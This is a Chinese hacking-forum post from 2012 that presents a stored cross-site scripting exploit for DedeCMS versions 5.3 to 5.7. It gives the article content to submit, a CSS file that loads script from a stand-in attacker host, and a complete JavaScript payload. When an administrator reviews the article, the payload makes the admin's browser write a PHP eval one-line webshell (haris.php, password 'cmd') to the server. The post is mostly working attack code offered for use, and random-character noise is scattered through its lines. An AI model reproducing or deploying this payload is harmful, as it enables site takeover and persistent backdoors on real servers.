找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 dedecms xss oday通杀所有版本 可getshell
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1641|回复: 0
打印 上一主题 下一主题

dedecms xss oday通杀所有版本 可getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 13:56:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell* s% ]9 P' ^7 a: P7 k
为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)
2 J+ \" p5 {  w( r% H目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。
" d. t/ }% w" @) r下面说说利用方法。
9 x0 n5 E+ \& c0 [) o5 d1 c条件有2个:: _: e' T! n8 e$ ^
1.开启注册
: u# V% ^8 R6 P9 B0 b0 Q$ L2.开启投稿
' [3 w( w' m! V$ n0 Z- c' I注册会员----发表文章! {6 o1 O: E* C; d+ K4 x
内容填写:- f$ F# ^( u5 p3 G, u& ]
复制代码
8 ^4 J3 P5 m) ^" }$ K; e. |<style>@im\port'\http://xxx.com/xss.css';</style>$ h, v" _8 b% u- F
新建XSS.Css  X( {( e7 W5 l3 u
复制代码
: G5 _. P) L8 Z/ x* b.body{
- U! `; w6 }  t( Cbackground-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }+ s. U% A; z- |7 [" K
新建xss.js 内容为
4 V* y, Z" |4 B$ E' l' e9 K复制代码+ m6 U% ~' f1 L
1.var request = false;
$ ^6 l& v3 N7 `0 N+ O2.if(window.XMLHttpRequest) {
8 E6 `4 d) {( ?! q+ P5 M3.request = new XMLHttpRequest();0 Y' u( _! b  `, P1 r* w+ D
4.if(request.overrideMimeType) {
2 A+ ]0 e6 V( B+ K* V5.request.overrideMimeType('text/xml');
! T- F$ h4 \7 _3 N5 t5 ]6.}" o: f/ X# H! Z
7.} else if(window.ActiveXObject) {
4 R' Z7 f$ D" H3 m8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
0 m) o+ Q2 X- i9.for(var i=0; i<versions.length; i++) {" T$ Z9 F# t! J' S
10.try {! s! g# O& p& Y5 Q
11.request = new ActiveXObject(versions);
  V! T! N4 ^9 o12.} catch(e) {}2 K( F$ A3 G2 w( B( i6 Q$ |) Z
13.}4 t9 v8 i) m' A. }7 m, G
14.}
: V8 i# P  [' D. K15.xmlhttp=request;1 ^  q& S; E+ p# ^
16.function getFolder( url ){
. F1 k; t4 V% ~  J  p5 M6 h9 N. h17. obj = url.split('/')8 L' L2 ~5 O% T
18. return obj[obj.length-2]7 y- \+ r7 o2 N9 r0 H
19.}  w' F( e: N- d7 w% p. u5 f
20.oUrl = top.location.href;
( }6 R; D" C2 r21.u = getFolder(oUrl);
5 |/ d$ L8 u! w8 _22.add_admin();
/ t% i* [# `; i5 e$ N8 h$ X2 Y23.function add_admin(){- \6 c7 `% I! o* F4 I/ M1 P! \; I
24.var url= "/"+u+"/sys_sql_query.php";4 @8 E( L3 ?  d1 Q7 y' m8 S, L) f
25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";3 w3 N6 }" v+ X' V
26.xmlhttp.open("POST", url, true);
3 s- d5 ^5 [- {5 m# e$ x! o27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
4 G: x' _8 o7 |9 g( {28.xmlhttp.setRequestHeader("Content-length", params.length);# [& a0 f7 N) S/ W$ r, ?
29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");
% p8 j' M0 y8 f4 P30.xmlhttp.send(params);+ D  k. ~5 @  s6 j
31.}; ^" e1 P) z' c
当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表